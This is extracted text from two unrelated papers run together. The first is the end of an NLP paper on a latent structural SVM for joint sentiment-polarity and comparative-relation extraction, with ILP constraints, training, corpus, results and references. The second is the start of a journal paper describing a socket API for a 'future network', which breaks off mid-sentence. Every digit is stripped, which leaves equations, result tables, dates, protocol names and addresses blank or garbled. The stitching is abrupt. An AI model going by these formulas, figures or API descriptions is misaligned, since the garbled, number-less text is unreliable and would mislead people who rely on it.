mention. we expect that each edge has only one relation type and is sup- ported by a single textual evidence. to facilitate the formulation of constraints, we introduce ηel to de- note the presence or absence of a labeled edge el, and ηec to indicate if a textual evidence c is assigned to an unlabeled edge e. then the binary variable for the corresponding evidentiary edge zelc = ηec ∧ηel , where the ilp formulation of conjunction can be found in (martins et al., ). let ce denote the set of textual evidence candi- dates of an unlabeled edge e. the constraint of at most one textual evidence per edge is formulated as: ∑ c∈ce ηec ≤ ( ) once a textual evidence is assigned to an edge, their relation labels should match and the number of labeled edges must agree with the number of at- tached textual evidences. further, we assume that a textual evidence c conveys at most one relation so that an evidence will not be assigned to the relations of different types, which is the main problem for the structural svm based model. let ηcl indicate that the textual evidence c is labeled by the relation type l. the corresponding constraints are expressed as, ∑ l∈le ηel = ∑ c∈ce ηec; zelc ≤ ηcl; ∑ l∈l ηcl ≤ where le denotes the set of all possible labels for an unlabeled edge e, and l is the set of all relation types of mrgs (cf. section ). in order to avoid a textual evidence being overly reused by multiple relation candidates, we first pe- nalize the assignment of a textual evidence c to a labeled edge a by associating the corresponding zac with a fixed negative cost −µ in the objective func- tion. then the selection of one textual evidence per edge a is encouraged by associating µ to zdc in the objective function, where zdc = ∨ e∈sc ηec and sc is the set of edges that the textual evidence c serves as a candidate. 
the disjunction zdc is expressed as: zdc ≥ ηe,e ∈ sc zdc ≤ ∑ e∈sc ηe (a) binary edge structure (b) ternary edge structure figure : alternative structures associated with an attribute mention. this soft constraint not only encourages one textual evidence per edge, but also keeps it eligible for mul- tiple assignments. for any two labeled edge a and a′ incident to the same entity mention, the edge-to-edge co- occurrence is described by zca,a′ = za ∧za′ . emrg with both binary and ternary edges: if there are more than one entity mentions and at least one attribute mention in a sentence, an emrg can potentially have both binary and ternary edges. in this case, we assume that each mention of attributes can participate either in binary relations or in ternary relations. the assumption holds in more than . % of the sentences in our srg corpus, thus we describe it as a set of hard constraints. geometrically, the as- sumption can be visualized as the selection between two alternative structures incident to the same at- tribute mention, as shown in figure . note that, in the binary edge structure, we include not only the edges incident to the attribute mention but also the edge between the two entity mentions. let sbmi be the set of all possible labeled edges in a binary edge structure of an attribute mention mi. variable τbmi = ∨ el∈sbmi ηel indicates whether the attribute mention is associated with a binary edge structure or not. in the same manner, we use τtmi = ∨ el∈stmi ηel to indicate the association of the an attribute mention mi with an ternary edge struc- ture from the set of all incident ternary edges stmi . the selection between two alternative structures is formulated as τbmi + τ t mi = . as this influences only the edges incident to an attribute mention, we keep all the constraints introduced in the previous section unchanged except for constraint ( ), which is modified as ∑ c∈ce ηec ≤ τbmi ; ∑ c∈ce ηec ≤ τtmi therefore, we can have either binary edges or ternary edges for an attribute mention. learning model parameters given a set of training sentences d = {(x ,y ), . . . , (xn,yn)}, the best weight vec- tor β of the discriminant function ( ) is found by solving the following optimization problem: min β n n∑ i= [ max (ŷ,ĥ)∈y(x)×h(x) (β>Φ(x,ŷ, ĥ)+δ(ĥ, ŷ,y)) − max h̄∈h(x) β>Φ(x,y, h̄)] + ρ|β|] ( ) where δ(ĥ, ŷ,y) is a loss function measuring the dis- crepancies between an emrg (y,h̄) with gold stan- dard edge labels y and an emrg (ŷ, ĥ) with inferred labeled edges ŷ and textual evidences ĥ. due to the sparse nature of the lexical features, we apply l regularizer to the weight vector β, and the degree of sparsity is controlled by the hyperparameter ρ. since the l norm in the above optimization problem is not differentiable at zero, we apply the online forward-backward splitting (fobos) algo- rithm (duchi and singer, ). it requires two steps for updating the weight vector β by using a single training sentence x on each iteration t. βt+ = βt −εt∆t βt+ = arg min β ‖β −βt‖ + εtρ|β| where ∆t is the subgradient computed without con- sidering the l norm and εt is the learning rate. for a labeled sentence x, ∆t = Φ(x,ŷ∗, ĥ∗) − Φ(x,y, h̄∗), where the feature functions of the corre- sponding emrgs are inferred by solving (ŷ∗, ĥ∗) = arg max (ĥ,ŷ)∈h(x)×y(x)[β >Φ(x,ŷ, ĥ) + δ(ĥ, ŷ,y)] and (y,h̄∗) = arg maxh̄∈h(x) β >Φ(x,y, h̄), as in- dicated in the optimization problem ( ). 
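as an aside on the update itself: for the l1 penalty used here, the second fobos step has a well-known closed form, so each coordinate of the weight vector is simply soft-thresholded. this restatement is ours, following duchi and singer's derivation, and reuses the symbols above:

\beta_{t+\frac{1}{2}} = \beta_t - \varepsilon_t \Delta_t,
\qquad
\beta_{t+1,j} = \operatorname{sign}\!\big(\beta_{t+\frac{1}{2},j}\big)\,
\max\!\big(\big|\beta_{t+\frac{1}{2},j}\big| - \varepsilon_t \rho,\; 0\big).

coordinates whose magnitude falls below \varepsilon_t \rho are set exactly to zero, which is what produces the sparse weight vector desired for the lexical features.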
the former inference problem is similar to the one we considered in the previous section except the inclusion of the loss function. we incorporate the loss function into the ilp formulation by defin- ing the loss between an mrg (y,h) and a gold stan- dard mrg as the sum of per-edge costs. in our ex- periments, we consider a positive cost ϕ for each wrongly labeled edge a, so that if an edge a has a different label from the gold standard, we add ϕ to the coefficient sac of the corresponding variable zac in the objective function of the ilp formulation. in addition, since the non-positive weights of edge labels in the initial learning phrase often lead to emrgs with many unlabeled edges, which harms the learning performance, we fix it by adding a con- straint for the minimal number of labeled edges in an emrg, ∑ a∈a ∑ c∈ca ηac ≥ ζ ( ) where a is the set of all labeled edge candidates and ζ denotes the minimal number of labeled edges. empirically, the best way to determine ζ is to make it equal to the maximal number of labeled edges in an emrg with the restriction that a tex- tual evidence can be assigned to at most one edge. by considering all the edge candidates a and all the textual evidence candidates c as two vertex sets in a bipartite graph ĝ = 〈v = (a,c),e〉 (with edges in e indicating which textual evidence can be assigned to which edge), ζ corresponds to exactly the size of a maximum matching of the bipartite graph . to find the optimal emrg (y,h̄∗), for the gold la- bel k of each edge, we consider the following set of constraints for inference since the labels of the edges are known for the training data, ∑ c∈ce ηec ≤ ; ηec ≤ lck ∑ k′∈l lck′ ≤ ; ∑ e∈sc ηec ≤ we include also the soft constraints, which avoid a textual evidence being overly reused by multiple relations, and the constraints similar to ( ) to ensure a minimal number of labeled edges and a minimal number of sentiment-oriented relations. it is computed by the hopcroft-karp algorithm (hopcroft and karp, ) in our implementation. srg corpus for evaluation we constructed the srg corpus, which in total consists of manually annotated online reviews and forum posts in the digital camera and movie domains . for each domain, we maintain a set of attributes and a list of entity names. the annotation scheme for the sentiment repre- sentation asserts minimal linguistic knowledge from our annotators. by focusing on the meanings of the sentences, the annotators make decisions based on their language intuition, not restricted by specific syntactic structures. taking the example in figure , the annotators only need to mark the mentions of entities and attributes from both the sentences and the context, disambiguate them, and label (“canon d”, “nikon d ”, price) as worse and (“canon d”, “sensor”) as positive, whereas in prior work, people have annotated the sentiment-bearing expres- sions such as “great” and link them to the respective relation instances as well. this also enables them to annotate instances of both sentiment polarity and comparative relaton, which are conveyed by not only explicit sentiment-bearing expressions like “excel- lent performance”, but also factual expressions im- plying evaluations such as “the v has x optical zoom and the v has x.”. camera movie reviews forums reviews forums positive negative comparison table : distribution of relation instances in srg corpus. annotators participated in the annotation project. after a short training period, annotators worked on randomly assigned documents one at a time. 
for product reviews, the system lists all rel- evant information about the entity and the prede- fined attributes. for forum posts, the system shows only the attribute list. for each sentence in a doc- ument, the annotator first determines if it refers to an entity of interest. if not, the sentence is marked the camera reviews are from bestbuy.com and ama- zon.com; the camera forum posts are downloaded from fo- rum.digitalcamerareview.com; the movie reviews and forum posts are from imdb.com and boards.ie respectively as off-topic. otherwise, the annotator will identify the most obvious mentions, disambiguate them, and mark the mrgs. we evaluate the inter-annotator agreement on ssors in terms of cohen’s kappa (κ) (cohen, ). an average kappa value of . was achieved on a randomly selected set consisting of sentences. table shows the corpus distribution after nor- malizing them into ssors. camera forum posts con- tain the largest proportion of comparisons because they are mainly about the recommendation of dig- ital cameras. in contrast, web users are much less interested in comparing movies, in both reviews and forums. in all subsets, positive relations play a dom- inant role since web users intend to express more positive attitudes online than negative ones (pang and lee, ). experiments this section describes the empirical evaluation of senti-lssvm together with two competitive base- lines on the srg corpus. . experimental setup we implemented a rule-based baseline (ding- rule) and a structural svm (tsochantaridis et al., ) baseline (senti-ssvm) for comparison. the former system extends the work of ding et al. ( ), which designed several linguistically- motivated rules based on a sentiment polarity lexi- con for relation identification and assumes there is only one type of sentiment relation in a sentence. in our implementation, we keep all the rules of (ding et al., ) and add one phrase-level rule when there are more than one mention in a sentence. the ad- ditional rule assigns sentiment-bearing words and negators to its nearest relation candidates based on the absolute surface distance between the words and the corresponding mentions. in this case, the phrase- level sentiment-oriented relations depend only on the assigned sentiment words and negators. the lat- ter system is based on a structural svm and does not consider the assignment of textual evidences to relation instances during inference. the textual fea- tures of a relation candidate are all lexical and sen- timent predictor features within a surface distance of four words from the mentions of the candidate. thus, this baseline does not need the inference con- straints of senti-lssvm for the selection of textual evidences. to gain more insights into the model, we also evaluate the contribution of individual fea- tures of senti-lssvm. in addition, to show if identi- fying sentiment polarities and comparative relations jointly works better than tackling each task on its own, we train senti-lssvm for each task separately and combine their predictions according to compat- ibility rules and the corresponding graph scores. for each domain and text genre, we withheld % documents for development and use the remaining for cross validation. the hyperparameters of all sys- tems are tuned on the development datasets. for all experiments of senti-lssvm, we use ρ = . for the l regularizer in eq.( ) and ϕ = . for the loss function; and for senti-ssvm, ρ = . and ϕ = . . 
since the relation type of off-topic sentences is certainly other, we evaluate all systems with -fold cross-validation only on the on-topic sentences in the evaluation dataset. since the same ssor can have several equivalent mrgs and the rela- tion type other is not of our interest, we evaluate the ssors in terms of precision, recall and f-measure. all reported numbers are averages over the folds. . results table shows the complete results of all sys- tems. here our model senti-lssvm outperformed all baselines in terms of the average f-measure scores and recalls by a large margin. the f-measure on movie reviews is about % over the best base- line. the rule-based system has higher precision than recall in most cases. however, simply increas- ing the coverage of the domain independent senti- ment polarity lexicon might lead to worse perfor- mance (taboada et al., ) because many sen- timent oriented relations are conveyed by domain dependent expressions and factual expressions im- plying evaluations, such as “this camera does not have manual control.” compared to ding-rule, senti-ssvm performs better in the camera domain but worse for the movies due to many misclassi- fication of negative relation instances as other. it also wrongly predicted more positive instances as other than senti-lssvm. we found that the recalls of these instances are low because they often have overly similar features with the instances of the type other linking to the same mentions. the problem gets worse in the movie domain since i) many sen- tences contain no explicit sentiment-bearing words; ii) the prior polarity of the sentiment-bearing words do not agree with their contextual polarity in the sentences. consider the following example from a forum post about the movie “superman returns”: “have a look at superman: the animated series or justice league unlimited . . . that is how the char- acters of superman and lex luthor should be.”. in contrast, our model minimizes the overlapping fea- tures by assigning them to the most likely relation candidates. this leads to significantly better per- formance. although senti-ssvm has low recall for both positive and negative relations, it achieves the highest recall for the comparative relation among all systems in the movie domain and camera reviews. since less than % of all instances are for compara- tive relations in these document sets and all models are trained to optimize the overall accuracy, senti- lssvm intends to trade off the minority class for the overall better performance. this advantage disap- pears on the camera forum posts, where the number of instances of comparative relation is times more than that in the other data sets. all systems perform better in predicting positive relations than the negative ones. this corresponds well to the empirical findings in (wilson, ) that people intend to use more complex expressions for negative sentiments than their affirmative counter- parts. it is also in accordance with the distribution of these relations in our srg corpus which is randomly sampled from the online documents. for learning systems, it can also be explained by the fact that the training data for positive relations are considerably more than those for negative ones. the comparative relation is the hardest one to process since we found that many corresponding expressions do not contain explicit keywords for comparison. 
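for reference, the precision, recall and f-measure figures reported above (and in the ablation below) are the usual quantities; assuming the micro-averages pool true positives (tp), false positives (fp) and false negatives (fn) over the relation types of interest, they are

P = \frac{TP}{TP+FP},
\qquad
R = \frac{TP}{TP+FN},
\qquad
F = \frac{2\,P\,R}{P+R}.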
to understand the performance of the key fea- ture groups in our model better, we remove each group from the full senti-lssvm system and eval- uate the variations with movie reviews and camera forum posts, which have relatively balanced distri- bution of relation types. as shown in table , the features from the sentiment predictors make signif- icant contributions for both datasets. the differ- ent drops of the performance indicate that the po- positive negative comparison micro-average p r f p r f p r f p r f c am er a fo ru m ding-rule . . . . . . . . . . . . senti-ssvm . . . . . . . . . . . . senti-lssvm . . . . . . . . . . . . c am er a r e- vi ew ding-rule . . . . . . . . . . . . senti-ssvm . . . . . . . . . . . . senti-lssvm . . . . . . . . . . . . m ov ie fo ru m ding-rule . . . . . . . . . . . . senti-ssvm . . . . . . . . . . . . senti-lssvm . . . . . . . . . . . . m ov ie r e- vi ew ding-rule . . . . . . . . . . . . senti-ssvm . . . . . . . . . . . . senti-lssvm . . . . . . . . . . . . table : evaluation results for ding-rule, senti-ssvm and senti-lssvm. boldface figures are statistically significantly better than all others in the same comparison group under t-test with p = . . feature models movie reviews camera forums full system . . ¬unigram . (+ . ) . (- . ) ¬context . (- . ) . (+ . ) ¬co-occurrence . (- . ) . (- . ) ¬senti-predictors . (- . ) . (- . ) table : micro-average f-measure of senti-lssvm with different feature models larities predicted by rules are more consistent in camera forum posts than in movie reviews. due to the complexity of expressions in the movie re- views our model cannot benefit from the unigram features but these features are a good compensation for the sentiment predictor features in camera fo- rum posts. the sharp drop by removing the context features from our model on movie reviews indicates that the sentiments in movie reviews depend highly on the relations of the previous sentences. in con- trast, the sentiment-oriented relations of the previ- ous sentences could be a reason of overfitting for camera forum data. the edge co-occurrence fea- tures do not play an important role in our model since the number of co-occurred sentiment-oriented relations in the sentences with contrast conjunctions like “but” is small. however, we found that allow- ing the co-occurrence of any sentiment-oriented re- lations would harm the performance of the model. in addition, our experiments showed that the sep- arated approach, which trains a model for senti- ment polarities and comparative relations respec- tively, leads to a decrease by almost % in terms of the f-measure averaged over all four datasets. the largest drop of f-measure is % on camera forum posts, since this dataset contains the largest propor- tion of comparative relations. we found that the er- rors are increased when the trained models make conflicting predictions. in this case, the joint ap- proach can take all factors into account and make more consistent decisions than the separated ap- proaches. conclusion we proposed senti-lssvm model for extracting in- stances of both sentiment polarities and comparative relations. for evaluating and training the model, we created an srg corpus by using a lightweight an- notation scheme. we showed that our model can automatically find textual evidences to support its relation predictions and achieves significantly bet- ter f-measure scores than alternative state-of-the-art methods. references yejin choi and claire cardie. . 
adapting a polarity lexicon using integer linear programming for domain- specific sentiment classification. in proceedings of the conference on empirical methods in natural language processing: volume - volume , emnlp ’ , pages – , stroudsburg, pa, usa. associa- tion for computational linguistics. yejin choi and claire cardie. . hierarchical se- quential learning for extracting opinions and their at- tributes. in proceedings of the annual meeting of the association for computational linguistics, pages – . association for computational linguistics. yejin choi, eric breck, and claire cardie. . joint extraction of entities and relations for opinion recog- nition. in proceedings of the conference on empirical methods in natural language processing, pages – , stroudsburg, pa, usa. association for compu- tational linguistics. jacob cohen. . weighted kappa: nominal scale agreement provision for scaled disagreement or par- tial credit. psychological bulletin, ( ): . xiaowen ding, bing liu, and philip s. yu. . a holistic lexicon-based approach to opinion mining. in proceedings of the international conference on web search and data mining, pages – , new york, ny, usa. acm. xiaowen ding, bing liu, and lei zhang. . entity discovery and assignment for opinion mining applica- tions. in proceedings of the acm sigkdd confer- ence on knowledge discovery and data mining, pages – . john duchi and yoram singer. . efficient online and batch learning using forward backward splitting. the journal of machine learning research, : – . murthy ganapathibhotla and bing liu. . mining opinions in comparative sentences. in proceedings of the nd international conference on computational linguistics - volume , pages – , stroudsburg, pa, usa. association for computational linguistics. namrata godbole, manjunath srinivasaiah, and steven skiena. . large-scale sentiment analysis for news and blogs (system demonstration). in proceed- ings of the international aaai conference on weblogs and social media. john e hopcroft and richard m karp. . an nˆ / algorithm for maximum matchings in bipartite graphs. siam journal on computing, ( ): – . minqing hu and bing liu. . mining and summa- rizing customer reviews. in proceedings of the tenth acm sigkdd international conference on knowl- edge discovery and data mining, proceedings of the acm sigkdd conference on knowledge discov- ery and data mining, pages – , new york, ny, usa. acm. wei jin, hung hay ho, and rohini k. srihari. . opinionminer: a novel machine learning system for web opinion mining and extraction. in proceedings of the th acm sigkdd international conference on knowledge discovery and data mining, pages – , new york, ny, usa. acm. nitin jindal and bing liu. . mining comparative sentences and relations. in proceedings of the st in- ternational conference on artificial intelligence - vol- ume , aaai’ , pages – . aaai press. richard johansson and alessandro moschitti. . extracting opinion expressions and their polarities– exploration of pipelines and joint models. in proceed- ings of the annual meeting of the association for com- putational linguistics, volume , pages – . jason s. kessler, miriam eckert, lyndsie clark, and nicolas nicolov. . the icwsm jdpa sent- ment corpus for the automotive domain. in th inter- national aaai conference on weblogs and social me- dia data workshop challenge (icwsm-dwc ). soo-min kim and eduard hovy. . extracting opin- ions, opinion holders, and topics expressed in online news media text. 
in proceedings of the workshop on sentiment and subjectivity in text, sst ’ , pages – , stroudsburg, pa, usa. association for computational linguistics. dan klein and christopher d. manning. . accurate unlexicalized parsing. in proceedings of the st an- nual meeting on association for computational lin- guistics - volume , acl ’ , pages – , strouds- burg, pa, usa. association for computational lin- guistics. lun-wei ku, yu-ting liang, and hsin-hsi chen. . opinion extraction, summarization and tracking in news and blog corpora. in aaai spring sympo- sium: computational approaches to analyzing we- blogs, pages – . bing liu, minqing hu, and junsheng cheng. . opinion observer: analyzing and comparing opinions on the web. in proceedings of the th international conference on world wide web, pages – , new york, ny, usa. acm. andré l. martins, noah a. smith, and eric p. xing. . concise integer linear programming formula- tions for dependency parsing. in proceedings of the annual meeting of the association for computational linguistics, pages – . ryan t. mcdonald, kerry hannan, tyler neylon, mike wells, and jeffrey c. reynar. . structured mod- els for fine-to-coarse sentiment analysis. in proceed- ings of the annual meeting of the association for com- putational linguistics. bo pang and lillian lee. . opinion mining and sentiment analysis. foundations and trends in infor- mation retrieval, ( - ): – . ana-maria popescu and oren etzioni. . extract- ing product features and opinions from reviews. in proceedings of the conference on human language technology and empirical methods in natural lan- guage processing, hlt ’ , pages – , strouds- burg, pa, usa. association for computational lin- guistics. lizhen qu, georgiana ifrim, and gerhard weikum. . the bag-of-opinions method for review rat- ing prediction from sparse text patterns. in chu-ren huang and dan jurafsky, editors, proceedings of the rd international conference on computational lin- guistics (coling ), acl anthology, pages – , beijing, china. tsinghua university press. lizhen qu, rainer gemulla, and gerhard weikum. . a weakly supervised model for sentence-level seman- tic orientation analysis with multiple experts. in joint conference on empirical methods in natural lan- guage processing and computational natural lan- guage learning (emnlp-conll), pages – , jeju island, korea, july. proceedings of the annual meeting of the association for computational linguis- tics. richard socher, brody huval, christopher d. manning, and andrew y. ng. . semantic compositionality through recursive matrix-vector spaces. in proceed- ings of the conference on empirical methods in natu- ral language processing, pages – . swapna somasundaran and janyce wiebe. . rec- ognizing stances in online debates. in proceedings of the joint conference of the th annual meeting of the association for computational linguistics and the th international joint conference on natural language processing of the asian federation of natural lan- guage processing, pages – . maite taboada, julian brooke, milan tofiloski, kim- berly d. voll, and manfred stede. . lexicon- based methods for sentiment analysis. computational linguistics, ( ): – . oscar täckström and ryan mcdonald. . discov- ering fine-grained sentiment with latent variable struc- tured prediction models. in proceedings of the rd european conference on advances in information re- trieval, ecir’ , pages – , berlin, heidelberg. springer-verlag. cigdem toprak, niklas jakob, and iryna gurevych. . 
sentence and expression level annotation of opinions in user-generated discourse. in proceedings of the th annual meeting of the association for computational linguistics, acl ’ , pages – , stroudsburg, pa, usa. association for computational linguistics. ioannis tsochantaridis, thomas hofmann, thorsten joachims, and yasemin altun. . support vec- tor machine learning for interdependent and structured output spaces. in proceedings of the international conference on machine learning, pages – . wei wei and jon atle gulla. . sentiment learn- ing on product reviews via sentiment ontology tree. in proceedings of the annual meeting of the association for computational linguistics, pages – . janyce wiebe, theresa wilson, and claire cardie. . annotating expressions of opinions and emotions in language. language resources and evaluation, ( - ): – . theresa wilson, janyce wiebe, and paul hoffmann. . recognizing contextual polarity in phrase-level sentiment analysis. in proceedings of the confer- ence on human language technology and empirical methods in natural language processing, hlt ’ , pages – , stroudsburg, pa, usa. association for computational linguistics. theresa ann wilson. . fine-grained subjectivity and sentiment analysis: recognizing the intensity, po- larity, and attitudes of private states. ph.d. thesis, university of pittsburgh. yuanbin wu, qi zhang, xuanjing huang, and lide wu. . structural opinion mining for graph-based sen- timent representation. in proceedings of the confer- ence on empirical methods in natural language pro- cessing, pages – . ainur yessenalina and claire cardie. . composi- tional matrix-space models for sentiment analysis. in proceedings of the conference on empirical methods in natural language processing, pages – . chun-nam john yu and thorsten joachims. . learning structural svms with latent variables. in pro- ceedings of the international conference on machine learning, page . ning yu and sandra kübler. . filling the gap: semi-supervised learning for opinion detection across domains. in proceedings of the fifteenth conference on computational natural language learning, pages – . association for computational linguistics. international journal of advanced network, monitoring and controls volume , no. , doi: . /ijanmc- - design and research of future network (ipv ) api xu yinqiu shanghai decimal network information technology co. ltd. e-mail: @ .com xie jianping shanghai decimal network information technology co. ltd. e-mail: @ .cn abstract—socket is a way of process communication, that is used it to invoke some api function to realize the distribution network libraries in different host of data exchange between the relevant process. according to the tcp/ip protocol assigned to the network address of the local host, to communicate between the two processes, the host must know the other's location first, that is, the ip of the other host. at the same time, to get the port number, it is used to identify the local communication process; a local process in communication will occupy a port number, different process port number is different, so it must be assigned a port number that is not used before communication. a complete inter-network process consists of two processes and should use the same high-level protocol. ipv is the most important part of future network. this paper introduces the interface function and socket of ipv , which lays a foundation for further network application programming. keywords -ipv ; interface; socket; api i. 
interface and socket the transport layer implements end-to-end communication, so there are two terminals for each transport layer connection. what is the terminal of the transport layer connection? it is neither the host, nor the host's ip address, and not the application process, not the transport layer protocol port. the terminal to which the transport layer connects is called a socket. according to the definition of rfc , the port number is spliced to the ip address to form a socket. a socket is actually a communication endpoint, an interface between an application and a network protocol. each socket has a socket number, including the ip address of the host and a -bit host port number, such as (host ip address: port number). in short, socket is equals to (ip address: port number), which is represented by a decimal ip address followed by a port number, separated by a colon or comma. each transport layer connection is uniquely identified by two terminals (that is, two sockets) at each end of the communication. for example, if the ipv address is . . . and the port number is , the resulting socket is ( . . . : ), if the ipv address is [ [ ] . . . and the port number is , the resulting socket is ( [ [ ] . . . : ). a socket can be thought of as a terminal in the communication connection between two network applications. during communication, a piece of information to be transmitted by one of the network applications is written into the socket of its host, which sends the piece of information to the socket of another host through the transmission medium of the network interface, so that the piece of information can be transmitted to other programs. therefore, the data transfer between the two applications is done through the socket. during network application design, ipv can be realized through the programming interface of tcp/ip provided by the system, since the core content of tcp/ip is encapsulated in the operating system. all clients and servers of tcp-based socket programming begin with calling a socket, which international journal of advanced network, monitoring and controls volume , no. , returns a socket descriptor. the client then calls the connect function, while the server calls the bind (), listen (), and accept () functions. the socket is usually closed by using the standard close function, but it can be also used the shutdown function to close the socket. the socket interaction flow is shown in figure . figure . the socket interaction flow ii. ipv socket in the linux environment of ipv , the core contents of tcp /ip are encapsulated in the operating system kernel. in order to support user development of application-oriented communication programs, most systems provide a set of application programming interfaces (api) based on tcp or udp , which are usually presented in the form of a set of functions, also known as sockets. these sockets are described below. this document is the ipv protocol experimental application development instructions, non-industry standard documents. a. socket a socket is an abstraction layer through which applications can send or receive data and open, read, and close it as if it were a file.sockets allow applications to plug i/o into the network and communicate with other applications in the network. this version of network sockets supports a combination of ipv , ipv , and ipv addresses and ports. 
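before the per-function reference that follows, a minimal server-side example of the interaction flow described above (socket, bind, listen, accept, then recv/send and close) may be helpful. it is written against the standard ipv4 sockets api purely for illustration; the address family and port number are placeholders, since the protocol-family constants of the stack described in this paper are not reproduced here. the corresponding client simply calls socket followed by connect to the server's address, then send and recv.

    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    #include <unistd.h>
    #include <sys/types.h>
    #include <sys/socket.h>
    #include <arpa/inet.h>

    int main(void)
    {
        /* server side: socket() -> bind() -> listen() -> accept() -> recv()/send() -> close() */
        int s = socket(AF_INET, SOCK_STREAM, 0);        /* AF_INET used only for illustration */
        if (s < 0) { perror("socket"); return EXIT_FAILURE; }

        struct sockaddr_in addr;
        memset(&addr, 0, sizeof(addr));
        addr.sin_family      = AF_INET;
        addr.sin_addr.s_addr = htonl(INADDR_ANY);
        addr.sin_port        = htons(8000);             /* placeholder port number */

        if (bind(s, (struct sockaddr *)&addr, sizeof(addr)) < 0) { perror("bind"); return EXIT_FAILURE; }
        if (listen(s, 5) < 0) { perror("listen"); return EXIT_FAILURE; }

        int c = accept(s, NULL, NULL);                  /* blocks until a client connect() arrives */
        if (c < 0) { perror("accept"); return EXIT_FAILURE; }

        char buf[256];
        ssize_t n = recv(c, buf, sizeof(buf), 0);       /* read one message from the client */
        if (n > 0)
            send(c, buf, (size_t)n, 0);                 /* echo it back */

        close(c);
        close(s);
        return EXIT_SUCCESS;
    }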
) head file #include<sys/types.h> #include<sys/socket.h> ) prototype int socket(int domain, int type, int protocol); ) description socket: creates and returns a communication sleeve interface handle. the parameter domain describes the communication domain, that is, the select communication protocol family. these communication protocol families are defined in the header file international journal of advanced network, monitoring and controls volume , no. , <sys/socket.h>. currently supported protocol families are as follows:  pf_unix,pf_local(local communication protocol)  pf_inetipv (protocol)  pf_inet (ipv protocol)  pf_inet (ipv protocol)  pf_ipxnovell (protocol)  pf_netlink(core user interface device)  pf_x itu-t x. (protocol)  pf_ax ax. (protocol)  pf_atmpvc(access to the original atm pvcs)  pf_appletalkappletalk  pf_packet(low-level envelope interface ) the parameter type is used to describe the communication semantics. currently defined types are as follows:  sock_stream it provides sequential, reliable, duplex, connection-based byte streams that can also support out-of-band data transfer.  sock_dgram it supports datagram (connectionless, unreliable messages of fixed maximum length).  sock_seqpacket it provides a sequential, reliable, duplex, connection-based data path for datagram of fixed maximum length.  sock_raw it provides original network protocol access.  sock_rdm it provides a reliable datagram layer that does not guarantee order. some sets of interface types are not implemented on all protocol families, such as the sock seqpacket is not implemented in the af_inet protocol family the parameter protocol describes a special protocol for the socket interface. there is usually only one simple protocol that can support a particular set of interface types that contain a given family of protocols. of course, sometimes when multiple protocols exist that must be specified with this parameter. ) returned value - is returned value when an error occurs, and errno represents the error type value. otherwise, the socket interface handle value is returned。 b. bind () bind () is a local address to a set of interfaces function. this function is suitable for unconnected datagram or stream class interfaces and is used before connect () or listen () calls. when a socket () is created, it exists in a namespace (address family) but is not named. the bind () function establishes a local binding (host address/port number) for the socket interface by assigning a local name to an unnamed socket interface. ) head file #include<sys/types.h> #include<sys/socket.h> ) prototype bind(intsockfd, structsockaddr *my_addr, socklen_taddrlen); ) description bind() provides the local address my_addr for the socket interface handle, the length of my_addr is the parameter addrlen, which is called set interface name assignment. in general, a socket interface of type sock_stream must call bind() to assign a local address in order to connect and receive. international journal of advanced network, monitoring and controls volume , no. , the structure of the assignment is also different for different protocol families. such as for af_inet is sockaddr_in and af_inet is sockaddr_in . ) returned value return on success. the error returns - , and errno represents the error type value. c. 
connect () connect () is used to establish a connection to the specified socket。 ) head file #include <sys/types.h> #include<sys/socket.h> ) prototype connect (intsockfd, conststructsockaddr *serv_addr, socklen_taddrlen); ) description the handle sockfd must point to a socket interface. if the type of the socket interface is sock_dgram, the address represented by the parameter serv_addr is the default destination address of the datagram and the source address when the datagram is received. if the socket interface is of type sock_stream or sock_seqpacket, the call attempts to establish a connection to another socket interface. the other interface is described by the serv_addr parameter, which is the address of interface communication spaces, each of which interprets the serv_addr parameter. typically, connection-based protocols only successfully connect once; connectionless interfaces may connect multiple times to change sessions. a connectionless interface may also connect to an address whose family of protocols is af_unspec to cancel the session. ) returned value return on success. the error returns - , and errno represents the error type value. d. listen () it is used to create a socket interface and listen for the requested connection. ) head file #include <sys/types.h> #include<sys/socket.h> ) prototype int listen(int s, int backlog); ) description to confirm the connection, the socket is called to create a socket interface, and the listen () describes the willing to confirm the connection and the length limit of the connection queue before calling accept to confirm the connection. the listen () call only works on the socket interfaces of types sock_stream and sock_seqpacket. the parameter backlog defines the maximum length of the unconnected queue. ) returned value return on success. the error returns - , and errno represents the error type value. e. accept () it is used to create a socket interface and monitoring for the requested connection. ) head file #include <sys/types.h> #include<sys/socket.h> ) prototype int accept(int s, structsockaddr *addr, socklen_t *addrlen); ) description the accept function can be used based on the socket interface type of the connection (sock_stream, sock_seqpacket, and sock_rdm). it selects the first connection request in international journal of advanced network, monitoring and controls volume , no. , the unconnected queue, creates a new connected socket interface similar to the parameter s, and then assigns a handle to that socket interface and returns. the newly created socket interface is no longer in the listening state, and the source socket interface s is not affected by the call. ) returned value the error returns - , and errno represents the error type value. successfully returns a non-negative integer, representing the handle to the socket interface. f. select () it is used for monitoring three socket interfaces. ) head file #include <sys/time.h> #include <sys/types.h> #include <unistd.h> ) prototype int select(int n, fd_set *readfds, fd_set *writefds, fd_set *exceptfds, structtimeval*timeout); fd_clr(intfd, fd_set *set); fd_isset(intfd, fd_set *set); fd_set(intfd, fd_set *set); fd_zero(fd_set *set); ) description select () allows to monitoringthe three socket interface at the same time: readfds, writefds and exceptfds. the socket interface in the readfds will be listened for acceptable characters; the socket interface in writefds will be monitored to see if data can be sent immediately. 
the socket interface in exceptfds will be monitored for exceptions. four macros are defined to manipulate the set of socket interfaces: fd_zero will empty a set; fd_set and fd_clr add or remove a handle from the set. fd_isset is used to test whether a handle is in the set. the parameter n should be equal to the value of the highest file descriptor plus . the timeout parameter defines the maximum interval for the select call to block until it returns. it can be zero, so that select returns directly. if the timeout structure pointer is null, select will block the indeterminate time. ) returned value on success, return the socket interface handle contained in the socket interface set, returns if no change occurs after the maximum interval. - is returned on error, and errno represents the error type value g. recv (), recvfrom(), recvmsg() ) head file #include <sys/types.h> #include<sys/socket.h> ) prototype intrecv(int s, void *buf, size_tlen, int flags); intrecvfrom(int s, void *buf, size_tlen, int flags, structsockaddr *from, socklen_t *fromlen); intrecvmsg(int s, structmsghdr *msg, int flags); ) description the recvfrom() and recvmsg() calls are used to receive information from a socket interface, regardless of whether the socket interface is connection-oriented. if the from () parameter is not null, then the socket interfaces is not connection-oriented and the source address of the message is assigned to it. the fromlen parameter starts with the data buffer size of the parameter from and returns the buffer size of the actual storage address in the parameter from. international journal of advanced network, monitoring and controls volume , no. , a recv () call is usually used in a connected socket interface, this is equivalent to the case where the parameter from is null when recvfrom is called. if the data message is successfully received, the return value is the length of the data message. if the length of the data message 